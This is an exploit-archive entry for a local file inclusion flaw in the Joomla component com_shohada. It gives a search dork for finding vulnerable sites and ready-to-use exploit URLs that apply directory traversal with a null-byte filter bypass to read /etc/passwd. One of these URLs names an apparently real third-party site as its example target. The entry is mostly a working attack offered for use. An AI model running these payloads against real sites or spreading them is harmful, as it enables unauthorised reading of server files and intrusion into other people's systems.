id: 20760
date: 05/12/2013
title: Joomla Component com_shohada Local File Inclusion Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

Joomla Component com_shohada Local File Inclusion
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_shohada"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_shohada&controller=[LFI]
www.site.com/index.php?option=com_shohada&controller=../../../../../../../../../../etc/passwd%00

Example:
To Bypass Filter Type:/etc/passwd%00..........
gorgab.com/index.php?option=com_shohada&controller=../../../../../../../../../../etc/passwd%00
####################################################################

#  0day.today [2023-03-23]  #